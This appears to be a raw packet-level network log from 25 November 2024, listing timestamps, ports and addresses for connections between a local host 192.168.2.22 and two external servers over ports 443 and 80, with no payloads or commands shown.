                                                                                                                                                                                Nov 25, 2024 14:07:20.920948982 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.925198078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.925204992 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.925231934 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.925271988 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.925271988 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.927968025 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.927975893 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.928003073 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.928029060 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.928046942 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.930990934 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.930999041 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.931025028 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.931040049 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.931058884 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.935483932 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.935497046 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.935545921 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.935560942 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.938756943 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.938765049 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.938837051 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.938853025 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940093040 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940104961 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940144062 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940152884 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:20.940206051 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940217018 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940229893 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940243959 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940253019 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:20.940282106 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:20.940294027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940305948 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940319061 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.940340996 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:20.942950010 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.942984104 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.943010092 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.943026066 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.943065882 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.945983887 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.945991993 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.946044922 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.946063042 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.949624062 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.949687958 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.949703932 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.951981068 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952049017 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.952061892 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952094078 CET44349172193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:20.952136993 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:20.952749968 CET49172443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:21.062067032 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.062160969 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.062175035 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.066318035 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.066328049 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.066485882 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.132560015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.132734060 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.132793903 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.136888027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.137023926 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.137085915 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.144006014 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.144172907 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.144232035 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.152465105 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.152477980 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.152539015 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.160747051 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.160861015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.160917997 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.169080973 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.169274092 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.169325113 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.177540064 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.177637100 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.177762985 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.186323881 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.186414957 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.186467886 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.194323063 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.194391966 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.194439888 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.202862978 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.202923059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.202980995 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.211195946 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.211209059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.211256981 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.217858076 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.217962027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.218007088 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.324409008 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.324486017 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.324561119 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.325397015 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.325520039 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.325567007 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.329531908 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.329590082 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.329638958 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.333515882 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.333620071 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.333667040 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.337735891 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.337902069 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.337949991 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.342227936 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.342322111 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.342370033 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.346590042 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.346707106 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.346751928 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.351037979 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.351191998 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.351246119 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.355515957 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.355530977 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.355570078 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.359941959 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.360050917 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.360097885 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.364617109 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.364782095 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.364833117 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.370023966 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.370044947 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.370091915 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.374682903 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.374780893 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.374830008 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.378892899 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.379173994 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.379234076 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.383419991 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.383579016 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.383632898 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.387284994 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.387492895 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.387548923 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.391412973 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.391488075 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.391531944 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.515105963 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.515212059 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.515269995 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.516870022 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.517033100 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.517082930 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.520493031 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.520605087 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.520653963 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.524059057 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.524123907 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.524171114 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.527719975 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.527796984 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.527844906 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.531397104 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.531416893 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.531457901 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.534774065 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.534866095 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.534919024 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.538325071 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.538439035 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.538491011 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.541830063 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.542047977 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.542099953 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.545588017 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.545739889 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.545790911 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.549293995 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.549374104 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.549422026 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.552546024 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.552660942 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.552709103 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.556093931 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.556217909 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.556263924 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.559674978 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.559885025 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.559932947 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.563288927 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.563376904 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.563422918 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.566814899 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.566922903 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.566967964 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.570727110 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.570833921 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.570885897 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.573961020 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.574119091 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.574173927 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.577613115 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.577630997 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.577670097 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.581202030 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.581315041 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.581358910 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.584757090 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.584837914 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.584887028 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.588171959 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.588310957 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.588356972 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.591860056 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.592004061 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.592050076 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.595510006 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.595585108 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.595628023 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.598865032 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.598973036 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.599019051 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.602570057 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.602643967 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.602793932 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.640922070 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.641000032 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.641057014 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.642540932 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.642611027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.642659903 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.646995068 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.647047043 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.647089005 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.650825977 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.650882959 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.650938034 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.821142912 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.821162939 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.821260929 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.822315931 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.823133945 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.823184967 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.823234081 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.826934099 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.826984882 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.827052116 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.829736948 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.829786062 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.829828978 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.832536936 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.832582951 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.832724094 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.836527109 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.836582899 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.836591005 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.839970112 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.840029955 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.840054035 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.842827082 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.842884064 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.842905998 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.846518993 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.846575022 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.846673965 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.849858046 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.849909067 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.849968910 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.853250027 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.853307009 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.853352070 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.856929064 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.856987953 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.857117891 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.860728025 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.860783100 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.860801935 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.864135981 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.864228010 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.864269018 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.867815971 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.867861986 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.867939949 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.871130943 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.871179104 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.871242046 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.874658108 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.874705076 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.874779940 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.878249884 CET8049173172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:21.878294945 CET4917380192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:21.878350973 CET8049173172.234.205.135192.168.2.22
